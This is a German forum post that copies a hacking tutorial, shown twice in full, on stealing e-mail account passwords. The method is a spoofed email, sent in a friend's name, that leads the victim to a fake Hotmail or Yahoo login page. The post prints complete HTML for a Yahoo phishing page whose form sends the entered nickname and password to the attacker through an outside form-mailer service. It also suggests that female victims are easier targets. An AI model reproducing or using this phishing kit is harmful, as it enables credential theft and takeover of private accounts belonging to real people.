HurricanX
14.11.2004, 18:20
© Aurélien E. Martinez 2001
sakara@extended.de
http://roteseite.webjump.com
DAS KLAUEN VON PASSWÖRTERN VON E-MAIL ACCOUNTS
1. Vorwort
Auf vielen Boards steht immer die gleiche Frage: Wie kann ich das Passwort meines Freundes "hacken"?
Zuerstmal, wenn ihr es wirklich "hacken" wollt müsst ihr ziemlich gut sein, aber wer ist das schon in der heutigen Zeit.
Also gehen wir nach meinem Grundsatz vor: Wenn du dir etwas nicht klauen kannst dann lass es dir geben!
Der Weg führt also über social engineering (ok, wenn du nicht weisst was das ist kannst du gleich abhauen).
Allerdings ein bisschen müsst ihr auch noch coden (naja, in HTML), ein bisschen etwas von Computern solltet ihr also doch
verstehen.
2. Durchführung
Nun die Frage, wie bring ich jemanden dazu mir sein Passwort zu geben? Nun, ich hab mir das folgendes ausgedacht: Du schickst dem Opfer
(so gemein es ist, bei weibl. Personen klappts am besten) unter der Adresse einer Freundin von ihm/ihr eine E-Mail. Dazu benützts du am
besten ein Anonymmail Programm (dafür wurden die ja programmiert), welches ist egal, für unsere Zwecke genügen eigentlich alle.
In dieses Mail schreibst du dann etwa folgendes:
Tag (Name),
Sieh mal was ich da gefunden habe, diese Seite ist echt voll witzig, musst du dir unbedingt mal ansehen:
(URL)
(Abschiedswörter wie sie für den/die Betreffende/n typisch sind)
Nun, was für eine URL schickst du ihen aber? Eine die du selbst programmiert hast. Du programmierst eine Seite die aussieht wie
eine von z.B. Hotmail. Also mit Hotmail Logo, nem Text und nem Passwort Feld. Also Text schreibst du etwa das hin:
Es ist ein Problem mit Ihrem Hotmail Postfach aufgetreten bitte melden Sie sich deshalb nochmals an. Entschuldigen sie die
Umstände und benützen Sie weiterhin Hotmail! (Den Namen des Anbieters solltest du immer als Link schreiben)
Dann folgen 2 Formular Felder für Nickname und Passwort und ein submit Button. Dieses programmierst du so dass der Inhalt
des Formulars an deine E-Mail Adresse gesendet wird (am besten eine Anonyme Adresse). Du kannst da selbstverständlich selbst ein
cgi-script basteln, oder so wie ich nen Service nutzen der dir das gratis macht. Ich benutze den CWAK Service (http://mailservice.cwak.com/)
(den Einzigen den ich kenn). Dort kannstdu dich registrieren und bekommst dann ein hidden Button (das ist unsichtbar) das du in dein Formular
einbauen musst. Wenn du alles richtig gemacht hast wird nun der Formularinhalt den jemand eingibt an deine E-Mail Adresse gesandt.
Du brauchst dann blos noch zu warten!
Hir der Quellcode für sone Fakesite für Yahoo.com:
********************************HTML************** ******************
<html>
<head>
<title>
YAHOO - ERROR
</title>
</head>
<body>
<table border=0 width="100%" cellspacing=0 cellpadding=4>
<tr><td width="1%">yahoo.gif
</td><td align=right nowrap valign=bottom><font size=-1 face=Arial>Yahoo! (http://de.yahoo.com)</font><hr size=1 noshade></td>
<tr><td colspan=2 bgcolor=a0b8c8>
<font size=+1 face=Arial color=black>
Yahoo! Mail
</font>
</td></tr>
<tr>
<td valign=top colspan=2>
There is a problem with your YAHOO (http://www.yahoo.com) E-Mail account. Please enter your password and
your nickname again. Keep on using YAHOO (http://www.yahoo.com) Mail!</p>
<form action="http://send.formmailer.com/" method="POST">
Your Yahoo (http://de.yahoo.com) Nickname:<input type="normal" name="nickname" > </p>
Your Yahoo (http://de.yahoo.com) password:
<input type="password" name="Passwort" >
<input type=submit value="send">
<input type="hidden" name="formmailer" value="XXXXX">
</form>
<tr>
<td height=4>
</td>
</tr>
</table>
</body>
</html>
********************************HTML************** ******************
3. Schlusswort
Ich habe diese Methode alleine herausgefunden behaupte aber nicht das ich der Erste bin der das so macht.
4.Benutzung dieses Textes
Nun, wer das ausprobiert tut dies auf eigene Gefahr, ich kann unter keinen Umständen für das Handeln anderer Personen haftbar
gemacht werden.
5.Vervielfältigung dieses Textes
Dieses Tutorial darf kostenlos überall publiziert werden solange nichts daran verändert wird. Wenn ihr es auf eure HP tut,
so schickt mir doch bitte ne Mail: sakara@extended.de .
6.Danksagungen
Allen die sich darum kümmern das ich auch mal was besseres kann als das hier, allen Genossen
und Genossinen auf dieser Erde dafür das sie für ihre Überzeugung einstehen und allen die
sich auch bei mir bedanken würden.
In diesem Sinne:
cu
Aurélien E. Martinez
sakara@extended.de
http://roteseite.webjump.com (keine Hacking Seite)
sakara@extended.de
http://roteseite.webjump.com
DAS KLAUEN VON PASSWÖRTERN VON E-MAIL ACCOUNTS
1. Vorwort
Auf vielen Boards steht immer die gleiche Frage: Wie kann ich das Passwort meines Freundes "hacken"?
Zuerstmal, wenn ihr es wirklich "hacken" wollt müsst ihr ziemlich gut sein, aber wer ist das schon in der heutigen Zeit.
Also gehen wir nach meinem Grundsatz vor: Wenn du dir etwas nicht klauen kannst dann lass es dir geben!
Der Weg führt also über social engineering (ok, wenn du nicht weisst was das ist kannst du gleich abhauen).
Allerdings ein bisschen müsst ihr auch noch coden (naja, in HTML), ein bisschen etwas von Computern solltet ihr also doch
verstehen.
2. Durchführung
Nun die Frage, wie bring ich jemanden dazu mir sein Passwort zu geben? Nun, ich hab mir das folgendes ausgedacht: Du schickst dem Opfer
(so gemein es ist, bei weibl. Personen klappts am besten) unter der Adresse einer Freundin von ihm/ihr eine E-Mail. Dazu benützts du am
besten ein Anonymmail Programm (dafür wurden die ja programmiert), welches ist egal, für unsere Zwecke genügen eigentlich alle.
In dieses Mail schreibst du dann etwa folgendes:
Tag (Name),
Sieh mal was ich da gefunden habe, diese Seite ist echt voll witzig, musst du dir unbedingt mal ansehen:
(URL)
(Abschiedswörter wie sie für den/die Betreffende/n typisch sind)
Nun, was für eine URL schickst du ihen aber? Eine die du selbst programmiert hast. Du programmierst eine Seite die aussieht wie
eine von z.B. Hotmail. Also mit Hotmail Logo, nem Text und nem Passwort Feld. Also Text schreibst du etwa das hin:
Es ist ein Problem mit Ihrem Hotmail Postfach aufgetreten bitte melden Sie sich deshalb nochmals an. Entschuldigen sie die
Umstände und benützen Sie weiterhin Hotmail! (Den Namen des Anbieters solltest du immer als Link schreiben)
Dann folgen 2 Formular Felder für Nickname und Passwort und ein submit Button. Dieses programmierst du so dass der Inhalt
des Formulars an deine E-Mail Adresse gesendet wird (am besten eine Anonyme Adresse). Du kannst da selbstverständlich selbst ein
cgi-script basteln, oder so wie ich nen Service nutzen der dir das gratis macht. Ich benutze den CWAK Service (http://mailservice.cwak.com/)
(den Einzigen den ich kenn). Dort kannstdu dich registrieren und bekommst dann ein hidden Button (das ist unsichtbar) das du in dein Formular
einbauen musst. Wenn du alles richtig gemacht hast wird nun der Formularinhalt den jemand eingibt an deine E-Mail Adresse gesandt.
Du brauchst dann blos noch zu warten!
Hir der Quellcode für sone Fakesite für Yahoo.com:
********************************HTML************** ******************
<html>
<head>
<title>
YAHOO - ERROR
</title>
</head>
<body>
<table border=0 width="100%" cellspacing=0 cellpadding=4>
<tr><td width="1%">yahoo.gif
</td><td align=right nowrap valign=bottom><font size=-1 face=Arial>Yahoo! (http://de.yahoo.com)</font><hr size=1 noshade></td>
<tr><td colspan=2 bgcolor=a0b8c8>
<font size=+1 face=Arial color=black>
Yahoo! Mail
</font>
</td></tr>
<tr>
<td valign=top colspan=2>
There is a problem with your YAHOO (http://www.yahoo.com) E-Mail account. Please enter your password and
your nickname again. Keep on using YAHOO (http://www.yahoo.com) Mail!</p>
<form action="http://send.formmailer.com/" method="POST">
Your Yahoo (http://de.yahoo.com) Nickname:<input type="normal" name="nickname" > </p>
Your Yahoo (http://de.yahoo.com) password:
<input type="password" name="Passwort" >
<input type=submit value="send">
<input type="hidden" name="formmailer" value="XXXXX">
</form>
<tr>
<td height=4>
</td>
</tr>
</table>
</body>
</html>
********************************HTML************** ******************
3. Schlusswort
Ich habe diese Methode alleine herausgefunden behaupte aber nicht das ich der Erste bin der das so macht.
4.Benutzung dieses Textes
Nun, wer das ausprobiert tut dies auf eigene Gefahr, ich kann unter keinen Umständen für das Handeln anderer Personen haftbar
gemacht werden.
5.Vervielfältigung dieses Textes
Dieses Tutorial darf kostenlos überall publiziert werden solange nichts daran verändert wird. Wenn ihr es auf eure HP tut,
so schickt mir doch bitte ne Mail: sakara@extended.de .
6.Danksagungen
Allen die sich darum kümmern das ich auch mal was besseres kann als das hier, allen Genossen
und Genossinen auf dieser Erde dafür das sie für ihre Überzeugung einstehen und allen die
sich auch bei mir bedanken würden.
In diesem Sinne:
cu
Aurélien E. Martinez
sakara@extended.de
http://roteseite.webjump.com (keine Hacking Seite)